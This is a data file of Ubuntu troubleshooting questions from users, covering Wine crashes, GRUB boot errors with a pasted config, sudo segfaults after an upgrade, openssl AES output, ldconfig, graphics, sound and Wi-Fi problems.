507936	wine sometimes crashes entire system	sometimes , programs that i am running with wine ( 1.7 ) will crash my entire system . ( ubuntu 14.04 ) clarification : during these crashes , ubuntu is 100 % non-responsive . i unable to use all of the following techniques : do ctrl-alt-t and xkill to kill the process . go into a virtual terminal to kill tty7 . kill the program with alt+f4 the only way to recover my system is to hold the power button on my box . ( edit : i was not using reisub , thanks for that suggestion ) . how can i ensure that wine is being modular and respecting the basic functions of my os ? also , any recommendations as to debugging wine at large ? any tips would be highly appreciated .
507937	when booting , grub errors and goes directly into cli	when i boot up , grub loads , but fires off an error about 6 or 7 times : error : failure reading sector 0xfc from 'hd1 ' . and repeat with other sectors . the problem is obvious , i do n't have an hd1 , when i boot from the cli i use these commands : linux ( hd0 , gpt6 ) /vmlinuz root=/dev/sda6 initrd ( hd0 , gpt6 ) /initrd.img boot what scripts can i fire off to give you some information ? i 've already tried remove -- purge and reinstall , install , update , install -- reinstall , all of that stuff . here 's my grub.cfg , sorry for bad formatting . # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi if [ `` $ { next_entry } '' ] ; then set default= '' $ { next_entry } '' set next_entry= save_env next_entry set boot_once=true else set default= '' 0 '' fi if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_gpt insmod ext2 set root='hd0 , gpt6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt6 -- hint-efi=hd0 , gpt6 -- hint-baremetal=ahci0 , gpt6 34e7542f-bbfc-4535-acab-af313ba2ff33 else search -- no-floppy -- fs-uuid -- set=root 34e7542f-bbfc-4535-acab-af313ba2ff33 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else if [ x $ feature_timeout_style = xy ] ; then set timeout_style=menu set timeout=10 # fallback normal timeout code in case the timeout_style feature is # unavailable . else set timeout=10 fi fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-34e7542f-bbfc-4535-acab-af313ba2ff33 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt6 -- hint-efi=hd0 , gpt6 -- hint-baremetal=ahci0 , gpt6 34e7542f-bbfc-4535-acab-af313ba2ff33 else search -- no-floppy -- fs-uuid -- set=root 34e7542f-bbfc-4535-acab-af313ba2ff33 fi linux /boot/vmlinuz-3.13.0-32-generic root=uuid=34e7542f-bbfc-4535-acab- af313ba2ff33 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-32-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced- 34e7542f-bbfc-4535-acab-af313ba2ff33 ' { menuentry 'ubuntu , with linux 3.13.0-32-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-32-generic-advanced- 34e7542f-bbfc-4535-acab-af313ba2ff33 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt6 -- hint- efi=hd0 , gpt6 -- hint-baremetal=ahci0 , gpt6 34e7542f-bbfc-4535-acab-af313ba2ff33 else search -- no-floppy -- fs-uuid -- set=root 34e7542f-bbfc-4535-acab-af313ba2ff33 fi echo 'loading linux 3.13.0-32-generic ... ' linux /boot/vmlinuz-3.13.0-32-generic root=uuid=34e7542f-bbfc-4535-acab- af313ba2ff33 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-32-generic } menuentry 'ubuntu , with linux 3.13.0-32-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-32- generic-recovery-34e7542f-bbfc-4535-acab-af313ba2ff33 ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt6 -- hint- efi=hd0 , gpt6 -- hint-baremetal=ahci0 , gpt6 34e7542f-bbfc-4535-acab-af313ba2ff33 else search -- no-floppy -- fs-uuid -- set=root 34e7542f-bbfc-4535-acab-af313ba2ff33 fi echo 'loading linux 3.13.0-32-generic ... ' linux /boot/vmlinuz-3.13.0-32-generic root=uuid=34e7542f-bbfc-4535-acab- af313ba2ff33 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-32-generic } menuentry 'ubuntu , with linux 3.13.0-30-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-30-generic-advanced- 34e7542f-bbfc-4535-acab-af313ba2ff33 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt6 -- hint- efi=hd0 , gpt6 -- hint-baremetal=ahci0 , gpt6 34e7542f-bbfc-4535-acab-af313ba2ff33 else search -- no-floppy -- fs-uuid -- set=root 34e7542f-bbfc-4535-acab-af313ba2ff33 fi echo 'loading linux 3.13.0-30-generic ... ' linux /boot/vmlinuz-3.13.0-30-generic root=uuid=34e7542f-bbfc-4535-acab- af313ba2ff33 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-30-generic } menuentry 'ubuntu , with linux 3.13.0-30-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-30- generic-recovery-34e7542f-bbfc-4535-acab-af313ba2ff33 ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt6 -- hint- efi=hd0 , gpt6 -- hint-baremetal=ahci0 , gpt6 34e7542f-bbfc-4535-acab-af313ba2ff33 else search -- no-floppy -- fs-uuid -- set=root 34e7542f-bbfc-4535-acab-af313ba2ff33 fi echo 'loading linux 3.13.0-30-generic ... ' linux /boot/vmlinuz-3.13.0-30-generic root=uuid=34e7542f-bbfc-4535-acab- af313ba2ff33 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-30-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-advanced- 34e7542f-bbfc-4535-acab-af313ba2ff33 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt6 -- hint- efi=hd0 , gpt6 -- hint-baremetal=ahci0 , gpt6 34e7542f-bbfc-4535-acab-af313ba2ff33 else search -- no-floppy -- fs-uuid -- set=root 34e7542f-bbfc-4535-acab-af313ba2ff33 fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic root=uuid=34e7542f-bbfc-4535-acab- af313ba2ff33 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24- generic-recovery-34e7542f-bbfc-4535-acab-af313ba2ff33 ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt6' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt6 -- hint- efi=hd0 , gpt6 -- hint-baremetal=ahci0 , gpt6 34e7542f-bbfc-4535-acab-af313ba2ff33 else search -- no-floppy -- fs-uuid -- set=root 34e7542f-bbfc-4535-acab-af313ba2ff33 fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic root=uuid=34e7542f-bbfc-4535-acab- af313ba2ff33 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry 'windows boot manager ( on /dev/sda1 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-efi-4eca-0da0 ' { insmod part_gpt insmod fat set root='hd0 , gpt1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt1 -- hint-efi=hd0 , gpt1 -- hint-baremetal=ahci0 , gpt1 4eca-0da0 else search -- no-floppy -- fs-uuid -- set=root 4eca-0da0 fi chainloader /efi/microsoft/boot/bootmgfw.efi } set timeout_style=menu if [ `` $ { timeout } '' = 0 ] ; then set timeout=10 fi # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # #
507941	find out the encoding method that gedit uses to open a text file ?	gedit successfully guessed the correct encoding charset of a text file . i would like to find out what the charset is , but could n't find a way in its menu . how can i do that ? thanks .
507949	rabbitvcs not working with ubuntu 12.04	i have followed all the steps to install from following urls : http : //ubuntuhandbook.org/index.php/2013/08/install-rabbitvcs-ubuntu-linux-mint-ppa/ http : //linuxg.net/how-to-install-rabbitvcs-on-ubuntu-13-04-12-10-12-04-linux-mint-15-14-13-and-elementary-os-0-2-luna/ http : //tutorialforlinux.blogspot.in/2013/08/tutorial-install-rabbitvcs-in-ubuntu.html just installed rabbitvcs , but nothing changed in nautilus none is working for me . can anyone please help ! ! !
507950	no sound in ubuntu 14.04 x64	after every `` suspend-wake'up '' my computer have no sound . i must `` renew '' sound in these two steps : system settings > sound > input device , i shall microphone probe . system settings > sound > test sound . then sound in my computer working properly .
507951	which package should i install to solve this problem ?	i am using ubuntu 14.04 ( 32bits ) when i installed torcs-1.3.1 ( which is a sort of racing game ) , error is occurred . error is `` no rule to make target /usr/include/i386-linux-gnu/bits/predefs.h ' , needed bycontrolconfig.o ' . stop . '' someone told me install libc6-dev , but it does n't work . please help me thank you for reading it .
507953	keyboard shortcut for opening a new window in ubuntu	what is the shortcut for opening a new window ( opening folders ) . for that i have to go to folder options and right click and then need to click on open new window . or i have to make focus on the folder icon or open a folder then press ctrl+n for opening a new window is there any direct command spcific to open a new window in ubuntu .
507956	lubuntu-ca n't watch videos/movies-choppy framerate	i am running lubuntu 14.04 on my acer aspire one za3 netbook . although i have flash player installed , i can not watch videos on youtube . i can only watch some frames and listen to certain parts of the video . i am not sure if i describe it correctly , but if the video has 100 frames in 5 seconds , i can only watch fewer , i.e . 20 . the same happens when i try to watch a movie either on vlc or in gnome media player . any idea on why is this happening and how can it be fixed ? running lspci | grep vga gives me 00:02.0 vga compatible controller : intel corporation system controller hub ( sch poulsbo ) graphics controller ( rev 07 ) while sudo lshw -c video gives *-display description : vga compatible controller product : system controller hub ( sch poulsbo ) graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 07 width : 32 bits clock : 33mhz capabilities : pm msi vga_controller bus_master cap_list rom configuration : driver=gma500 latency=0 resources : irq:16 memory : b0080000-b00fffff ioport:1800 ( size=8 ) memory : c0000000-cfffffff memory : b0000000-b003ffff note that i also have installed lubuntu-restricted-extras along with lubuntu-restricted-addons .
507957	unable to do su or sudo after upgrade from 13 to 14	i have upgraded from 13 to 14 , and in the upgrade process a lot of errors occurred . now i ca n't access root ( via su command ) or execute something like sudo apt-get install something . note : this is not a duplicate of segmentation fault when using su or sudo . i have tried the answers posted there but the did not work . please see edit 1 below . if i try : sudo apt-get install xxx i get this error : errore di segmentazione ( core dump creato ) segmentation fault ( core dump created ) how can i fix this problem ? edit 1 : i just tried aptdcon -- fix-install posted in the answer here : segmentation fault when using su or sudo , and it returned the following result : error : operazione di pacchetto non riuscita installazione o la rimozione di un pacchetto software non riuscita . dpkg : dependency problems prevent configuration of libpam-winbind : amd64 : libpam-winbind : amd64 depends on samba-libs ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ; however : package samba-libs is not installed . dpkg : error processing package libpam-winbind : amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of samba : samba depends on samba-libs ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ; however : package samba-libs is not installed . dpkg : error processing package samba ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of system-config-samba : system-config-samba depends on samba ; however : package samba is not configured yet . dpkg : error processing package system-config-samba ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of winbind : winbind depends on samba ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ; however : package samba is not configured yet . winbind depends on samba-libs ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ; however : package samba-libs is not installed . dpkg : error processing package winbind ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of samba-dsdb-modules : samba-dsdb-modules depends on samba-libs ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ; however : package samba-libs is not installed . dpkg : error processing package samba-dsdb-modules ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libsmbclient : amd64 : libsmbclient : amd64 depends on samba-libs ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ; however : package samba-libs is not installed . dpkg : error processing package libsmbclient : amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python-samba : python-samba depends on samba-libs ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ; however : package samba-libs is not installed . dpkg : error processing package python-samba ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of samba-vfs-modules : samba-vfs-modules depends on samba-libs ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ; however : package samba-libs is not installed . dpkg : error processing package samba-vfs-modules ( -- configure ) : dependency problems - leaving unconfigured after that i tried to run : echo \ '' $ ( dpkg -- get-selections | grep install | cut -f 1 ) \ '' and aptdcon -- reinstall `` package1 package2 package3 ... '' using the generated list , returning the following result : error : org.debian.apt.transactionfailed - error-cache-broken : i seguenti pacchetti presentano dipendenze non soddisfatte : libnss-winbind : depends : samba-common ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma 2:4.1.6+dfsg-1ubuntu2.14.04.3 è installato depends : winbind ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma 2:4.1.6+dfsg-1ubuntu2.14.04.3 è installato depends : libwbclient0 ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma 2:4.1.6+dfsg-1ubuntu2.14.04.3 è installato depends : samba-libs ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma non è installato libpam-smbpass : depends : samba-common ( = 2:3.6.18-1ubuntu3.3 ) ma 2:4.1.6+dfsg-1ubuntu2.14.04.3 è installato libpam-winbind : depends : samba-common ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma 2:4.1.6+dfsg-1ubuntu2.14.04.3 è installato depends : winbind ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma 2:4.1.6+dfsg-1ubuntu2.14.04.3 è installato depends : samba-libs ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma non è installato libsmbclient : depends : samba-libs ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma non è installato python-samba : depends : python ( < 2.8 ) ma 2.7.5-5ubuntu3 è installato depends : python : any ( > = 2.7.1-0ubuntu2 ) ma è un pacchetto virtuale depends : samba-libs ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma non è installato samba : depends : heimdal-hdb-api-8 ma è un pacchetto virtuale depends : samba-common ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma 2:4.1.6+dfsg-1ubuntu2.14.04.3 è installato depends : samba-common-bin ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma 2:4.1.6+dfsg-1ubuntu2.14.04.3 è installato depends : python ( < 2.8 ) ma 2.7.5-5ubuntu3 è installato depends : python2.7 : any ma è un pacchetto virtuale depends : samba-libs ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma non è installato samba-common-bin : depends : samba-common ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma 2:4.1.6+dfsg-1ubuntu2.14.04.3 è installato depends : python2.7 : any ma è un pacchetto virtuale depends : samba-libs ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma non è installato samba-dsdb-modules : depends : samba-libs ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma non è installato samba-vfs-modules : depends : samba-libs ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma non è installato smbclient : depends : samba-common ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma 2:4.1.6+dfsg-1ubuntu2.14.04.3 è installato depends : samba-libs ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma non è installato winbind : depends : samba ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma 2:4.1.6+dfsg-1ubuntu2.14.04.3 è installato depends : libwbclient0 ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma 2:4.1.6+dfsg-1ubuntu2.14.04.3 è installato depends : samba-libs ( = 2:4.1.6+dfsg-1ubuntu2.14.04.3 ) ma non è installato
507961	getting openssl aes output in hex format	i am trying to use openssl 's aes implementation . the encryption and decryption is working fine but when i compare the ciphertext to an online implementation they do n't match . openssl aes-256-cbc -a -e -k 00000000000000000000000000000000 -iv 00000000000000000000000000000000 -in plain.txt -out encrypted.txt plain.txt : 0xf34481ec3cc627bacd5dc3fb08f273e6 encrypted.txt : wrts5lz9x6qbwhlcgoffila5i25m1hby81jjcg9syaw2acmcyelmaww7fv9dbiwy online aes : openssl output is in base64 encoded format ( because of the -a flag ) . how do i get it in hex format ? ( -hex flag is not there for aes ) edit : even after using hexdump as suggested by muru , the encrypted text is not the same as online-domain-tools.com ( see screenshot ) . am i missing something ?
507962	error when loading update manager	getting following error when launching update manager : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened . ' also unable to open ubuntu software center and ubuntu one . unable to update via command line as well . sonu @ sonu : ~ $ sudo apt-get upgrade reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-en e : the package lists or status file could not be parsed or opened . same error when running sudo apt-get update . i am using ubuntu 12.04 lts . please advise me on how to resolve this problem .
507963	how to get rid of terminal window when application was launched from command line ?	i am running an application which is lying in /usr/bin/application/bin/myapp . to run this file i need to execute ./application/bin/myapp in terminal window . now on running this way a terminal window always remain associated with the application and if i do ctrl+c in that window it closes the application . is there any other optimal to run myapp , so that i do n't see terminal window associated with it . i also tried to run by directly going to /usr/bin/application/bin right click onmyapp and chose open with run software but loader appears on it for few seconds and then nothing happens . i have its tar.xz file and i run tar -- strip=1 -xjvf myapp*xz command to install it .
507966	fonts messed up after installing kubuntu desktop on ubuntu 14.04	i decided i wanted to try kubuntu since i had some difficulties with the unity desktop . i do not remember exactly the command ( s ) i run , but i think i used sudo apt-get install kubuntu-desktop . now the fonts are messed up both in kde plasma desktop and in unity . here is an example from a web mail page : here is how it should look like ( and how it looked like before installing kubuntu ) : here is what i have tried : i tried to look for a file ~/.fonts.conf and disable font hinting , see this answer : ugly font after kde installation . i also tried the modifications suggested in this answer : web fonts became ugly after installing kde i tried run sudo apt-get purge pango-graphite suggested in this answer : font-messed-up update : it seems the font problem depends on the browser also . i made this small test html script : < html > < body style= '' font-family : sans-serif ; '' > lorem ipsum dolor sit amet , consectetur adipiscing elit . curabitur laoreet eros tortor , quis sodales quam ullamcorper tincidunt . nunc a dolor ac urna sollicitudin aliquam ut id sem . integer in sem magna . phasellus tincidunt , nunc nec mattis facilisis , metus risus ultrices leo , quis convallis lorem nulla nec ante . proin consectetur , mauris nec iaculis gravida , risus mi blandit ante , a sollicitudin neque diam ut nisi . praesent nec leo quis sem accumsan dignissim . ut ornare consectetur scelerisque . etiam vel dapibus est . phasellus imperdiet ipsum ut commodo tincidunt . quisque malesuada et ante eu rutrum . nulla porttitor blandit dui at sollicitudin . < /body > < /html > note that the font family is sans-serif ( it seems like the problem is most pronounced when font-family is set to only sans-serif ) result in chromium browser : the page looks much better in firefox :
507969	compatibility ubuntu and msi ge60	we are online web shop and we are looking laptops to be sell with ubuntu installed . we have an order with a distributor of msi but we can have not tried ubuntu in msi laptops previously . these are the laptops : msi ge60 2pc ( apache ) -281xes - `` i7-4710mq/8gb/1tb/vga 2gb/15.6 '' '' /freedos `` -- nvidia-gtx850m msi ge60 2pe ( apache pro ) -213xes - `` i5-4200h/4gb/750gb/vga 2gb/15.6 '' '' /freedos '' –nvidia-gtx860m msi ge60 2pl ( apache ) -264xes - `` i5-4200h/4gb/500gb/vga 2gb/15.6 '' '' /freedos '' –nvidia-gtx850m msi ge70 2oe-474xes-bb54208g75sx negro - i5-4200/8gb/750gb/vga 2gb/freedos –nvidia-gtx765m msi ge70 2pc ( apache ) -211xes - `` i5-4200h/4gb/750gb/vga 2gb/17.3 '' '' /freedos '' –nvidia-gtx850m msi gt60 2pc ( dominator ) -829xes - `` i7-4710mq/8gb/ssd 128gb+1tb/vga 3gb/15.6 '' '' /freedos '' –nvidia-gtx870m are they 100 % compatible with ubuntu 14.04 ? thanks
507972	how can i debug cuda using gtx 670	i am trying to debug the pcl code using cuda . unfortunately it gives me the following message in the debug mode `` all cuda devices are used for display and can not be used while debugging '' ! ! i have checked online for solutions and i found out that the problem is that the the video card is used to display the x11 windows ! what can i do ?
507974	does 64 bit amd works on intell core 2 duo ?	does 64 bit amd works on intell core 2 duo ?
507978	how does ldconfig work ?	i am playing with ubuntu libraries . i am trying to add some libraries to /usr/lib/ < subdir > / and to create some proxies for the libraries in /usr/lib/ < subdir > / . note that /usr/lib/ < subdir > / exists in one of the files in /etc/ld.so.cond.d/ . unfortunately , ldconf behaviour seems to be very weird and non-trivial for me . and that 's why : when i add some library to /usr/lib/ < subdir > /it is not detected until i add a symbolic link to it from /usr/lib . why ? i found out that often libraries are placed in /usr/lib/ < subdir > / in a form of triplets : /usr/lib/ < subdir > /lib < libname > .so - symbolic link to lib < libname > .so.1 /usr/lib/ < subdir > /lib < libname > .so.1 - symbolic link to lib < libname > .so. < version > /usr/lib/ < subdir > /lib < libname > .so. < version > - the actual library ok. to create a proxy i decided to remove symbolic links and to add my own , say /usr/lib/ < subdir > /lib < libname > abc.so - symbolic link to lib < libname > abc.so.1 /usr/lib/ < subdir > /lib < libname > abc.so.1 - symbolic link to lib < libname > .so. < version > and then suddenly when i run sudo ldconfig to update this stuff it creates /usr/lib/ < subdir > /lib < libname > .so.1 which points to /usr/lib/ < subdir > /lib < libname > abc.so.1 . i ca n't get the logic at all .
507982	ubuntu 14.04 on panda board	how can i start egl services on panda board ubuntu 14.04 without x11 ? which package is responsible to do pvrsrvinit instead of glx support in older versions ? i have omap drm dkms module running and tested in ubuntu 12.04 version i tried running kmscube and i get this error message : mesa-loader : malformed or no pci id gbm : failed to open any driver ( search paths /usr/lib/arm-linux-gnueabihf/dri : $ { origin } /dri : /usr/lib/dri ) failed to load driver : omapdrm
507983	nfs kernel daemon : no support in current kernel	i installed nfs server on my ubuntu 12.04 64 bit with apt-get install and when i try to start the server i always see : nfs kernel daemon : no support in current kernel .
507988	ubuntu can not detect the built in video card ?	ubuntu 14.04 can not detect the built in video card ! it can detect the nvidia card only ! please advise ,
507995	wifi disabled by hard switch	my wifi is disabled . i have an asus r704v laptop and there is no hardware switch to turn wifi on/off , thus i can not go online using wifi . the driver is the correct one for the realtrek card . how do i switch my wifi on ?
507999	problem in ubuntu installation	recently i decided to start using ubuntu . i have a lenovo s10-3t laptop . it has no cd drive , so i tried to install ubuntu via universal usb installer . the problem i am facing is , that i do the process like choose the os i want to install select the iso file i have downloaded choose the ( c : ) partition and format my hard drive in fat32 . in the end i press `` create '' and immediately after that this message pops up aborting ! ( c : ) contains a windows/system 32 directory . so eventually i ca n't go on to the format and install .
508001	problem with the sound composition on ubuntu studio	i need your help with my existing ubuntu fork , ubuntu studio . i installed that fork , because i wanted to start making music videos on youtube , hopping that i 'm gon na make some money . but , there is a problem . when i run lmms , audiosauna on chrome or any other related program i 'm not able to listen to the sound . even after extracting the song . only the program named hydrogen works , which is the program producing drum bits , but also in that program the extracted sound can not can be played except for one program named `` ardour3 '' . can you please help me because i 'm looking forward to starting making my own music .
508010	repairing windows 8 eufi boot after installing ubuntu 14.04 with legacy	the drive containing windows 8 automatically boots to grub after installing ubuntu 14.04 . i may have made a mistake when assigning which drive to install grub on , so now it has been 6 hours of panic mode trying to repair my windows 8 drive to become boot-able again . here is the kicker : if you look at the log , you 'll see boot-repair finds a copy of windows 8 on the `` agility '' drive , which is two 120gb ssds raided together . isw_dhifdabdha_oczagility1 : ____________________________________________________ file system : ntfs boot sector type : windows 8/2012 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 8 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe this particular installation of windows 8 is irrelevant . i have multiple windows versions installed on most of the drives , but the important win8 copy is n't installed on the oczagility drives , but on the 500gb drive listed below . drive : sde _____________________________________________________________________ disk /dev/sde : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sde1 2,048 976,771,071 976,769,024 7 ntfs / exfat / hpfs i 've tried the following : running boot-repair 's recommended settings ( log file : http : //paste.ubuntu.com/7977078/ ) select the drive manually in the uefi bios menu ( it boots to grub.. ) running windows 8 repair ( it ca n't repair anything , which i suspect is because its trying to repair the oczagility drive . missing boot flag ? i dunno ? ) known facts : i 'm able to boot into ubuntu just fine ubuntu was installed as legacy , not efi mode . i 've read that was a mistake . the grub menu shows `` ubuntu '' and the windows 8 installed on the agility raid drive ( not the 500gb ) the windows drive i 'm trying to boot to is mounted inside ubuntu . i have no problems viewing the files . so i know windows 8 is on there ... i just need to boot to it ! question : during my research , i came across https : //help.ubuntu.com/community/uefi # converting_ubuntu_into_efi_or_legacy_mode , which details steps to convert ubuntu to efi . those instructions want me separate /boot/efi partition . is this the right approach ? will that further complicate the situation ? i 'm scared to pull the trigger without further input from someone with more experience . any guidance would be most appreciated .
